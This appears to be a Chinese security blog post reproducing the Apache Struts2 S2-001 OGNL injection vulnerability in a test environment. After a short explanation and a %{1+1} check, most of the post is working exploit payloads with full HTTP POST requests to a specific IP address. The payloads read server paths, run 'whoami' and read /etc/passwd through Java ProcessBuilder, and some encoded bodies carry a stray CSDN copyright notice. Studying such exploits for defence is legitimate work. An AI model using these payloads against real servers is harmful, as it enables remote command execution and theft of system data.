该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

s2-001测试环境

验证漏洞

首先在password地方输入%{1+1}

点击登录返回2

证明漏洞存在。

POC && EXP

获取tomcat执行路径:

%{"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B%22tomcatBinDir%7B%22%2B%40java.lang.System%40getProperty%28%22user.dir%22%29%2B%22%7D%22%7D

获取web路径

%{
#[email protected]@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 999
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest%28%29%2C+%23response%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C+%23response.println%28%23req.getRealPath%28%27%2F%27%29%29%2C+%23response.flush%28%29%2C+%23response.close%28%29+%7D+%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94+%E7%89%88%E6%9D%83%E5%A3%B0%E6%98%8E%EF%BC%9A%E6%9C%AC%E6%96%87%E4%B8%BACSDN%E5%8D%9A%E4%B8%BB%E3%80%8Ctdcoming%E3%80%8D%E7%9A%84%E5%8E%9F%E5%88%9B%E6%96%87%E7%AB%A0%EF%BC%8C%E9%81%B5%E5%BE%AACC+4.0+BY-SA%E7%89%88%E6%9D%83%E5%8D%8F%E8%AE%AE%EF%BC%8C%E8%BD%AC%E8%BD%BD%E8%AF%B7%E9%99%84%E4%B8%8A%E5%8E%9F%E6%96%87%E5%87%BA%E5%A4%84%E9%93%BE%E6%8E%A5%E5%8F%8A%E6%9C%AC%E5%A3%B0%E6%98%8E%E3%80%82+%E5%8E%9F%E6%96%87%E9%93%BE%E6%8E%A5%EF%BC%9Ahttps%3A%2F%2Fblog.csdn.net%2Fqq_29647709%2Fjava%2Farticle%2Fdetails%2F84945159

命令执行

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1248
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D+%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94+%E7%89%88%E6%9D%83%E5%A3%B0%E6%98%8E%EF%BC%9A%E6%9C%AC%E6%96%87%E4%B8%BACSDN%E5%8D%9A%E4%B8%BB%E3%80%8Ctdcoming%E3%80%8D%E7%9A%84%E5%8E%9F%E5%88%9B%E6%96%87%E7%AB%A0%EF%BC%8C%E9%81%B5%E5%BE%AACC+4.0+BY-SA%E7%89%88%E6%9D%83%E5%8D%8F%E8%AE%AE%EF%BC%8C%E8%BD%AC%E8%BD%BD%E8%AF%B7%E9%99%84%E4%B8%8A%E5%8E%9F%E6%96%87%E5%87%BA%E5%A4%84%E9%93%BE%E6%8E%A5%E5%8F%8A%E6%9C%AC%E5%A3%B0%E6%98%8E%E3%80%82+%E5%8E%9F%E6%96%87%E9%93%BE%E6%8E%A5%EF%BC%9Ahttps%3A%2F%2Fblog.csdn.net%2Fqq_29647709%2Fjava%2Farticle%2Fdetails%2F84945159

执行任意命令时,如果所执行的命令需要组合,则将上述 payload 改为:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1269
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D+%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94%E2%80%94+%E7%89%88%E6%9D%83%E5%A3%B0%E6%98%8E%EF%BC%9A%E6%9C%AC%E6%96%87%E4%B8%BACSDN%E5%8D%9A%E4%B8%BB%E3%80%8Ctdcoming%E3%80%8D%E7%9A%84%E5%8E%9F%E5%88%9B%E6%96%87%E7%AB%A0%EF%BC%8C%E9%81%B5%E5%BE%AACC+4.0+BY-SA%E7%89%88%E6%9D%83%E5%8D%8F%E8%AE%AE%EF%BC%8C%E8%BD%AC%E8%BD%BD%E8%AF%B7%E9%99%84%E4%B8%8A%E5%8E%9F%E6%96%87%E5%87%BA%E5%A4%84%E9%93%BE%E6%8E%A5%E5%8F%8A%E6%9C%AC%E5%A3%B0%E6%98%8E%E3%80%82+%E5%8E%9F%E6%96%87%E9%93%BE%E6%8E%A5%EF%BC%9Ahttps%3A%2F%2Fblog.csdn.net%2Fqq_29647709%2Fjava%2Farticle%2Fdetails%2F84945159

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...